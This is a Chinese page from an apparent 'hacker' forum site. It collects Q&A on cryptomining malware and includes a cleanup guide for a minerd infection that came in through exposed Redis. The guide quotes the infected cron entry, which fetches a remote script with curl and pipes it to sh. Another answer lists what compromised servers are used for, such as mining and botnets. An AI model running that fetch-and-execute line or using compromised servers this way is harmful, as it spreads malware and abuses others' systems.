黑客业务

黑客基地,黑客教程,网络黑客,黑客论坛,黑客培训

黑客用我们服务器挖矿了(被黑客挖矿了怎么办)

本文导读目录:

最近听说进入不良网站,黑客会拿我们的手机挖矿啥的,自动弹出的不良网站我点进去一秒就退了,被挖矿吗?

没有想的那么神奇。。现在的不良网站一般都是教人如何赌博。。如何打架什么的。通常会有赌博网站的连接在里面。。诱惑你去赌博的。。没有什么挖矿什么的。。退出去以后。重启下手机。。基本就正常了。。

阿里云服务器被挖矿了怎么办?(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下,感兴趣的可以研究下:

 View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

服务器被下挖矿了怎么办

哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。

请问一下,黑客,渗透提权或者爆破到的服务器有什么用处,可以卖吗?

服务器用来挂 ,挖矿赚钱、挂电脑管家、因为是24小时不间断的开着。服务器可以用来搭建网站做VPN,抓鸡、功能很多可以自己开发。

为什么黑客们要广设服务器,用别人的手机设备去挖矿?

可能是因为用自己的手机设备去挖矿不安全,如果犯法的话也可能被之一时间找到,用别人的手机设备就可以安全的多,到时候找也找不到自己

如何通过云计算服务器实现比特币挖矿

各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;

挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;

当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。

  • 评论列表:
  •  囤梦绮筵
     发布于 2022-05-31 15:10:07  回复该评论
  • 内容如下,感兴趣的可以研究下: View Code解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis
  •  俗野释欢
     发布于 2022-05-31 10:51:17  回复该评论
  • ,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。
  •  纵遇假欢
     发布于 2022-05-31 21:48:51  回复该评论
  • d_keys, 删除你不认识的账号3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.服务器被下挖矿了怎么办哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥
  •  嘻友枝桠
     发布于 2022-05-31 22:08:43  回复该评论
  • is配置文件中.配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度好消息是Redis作者表示将会开

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.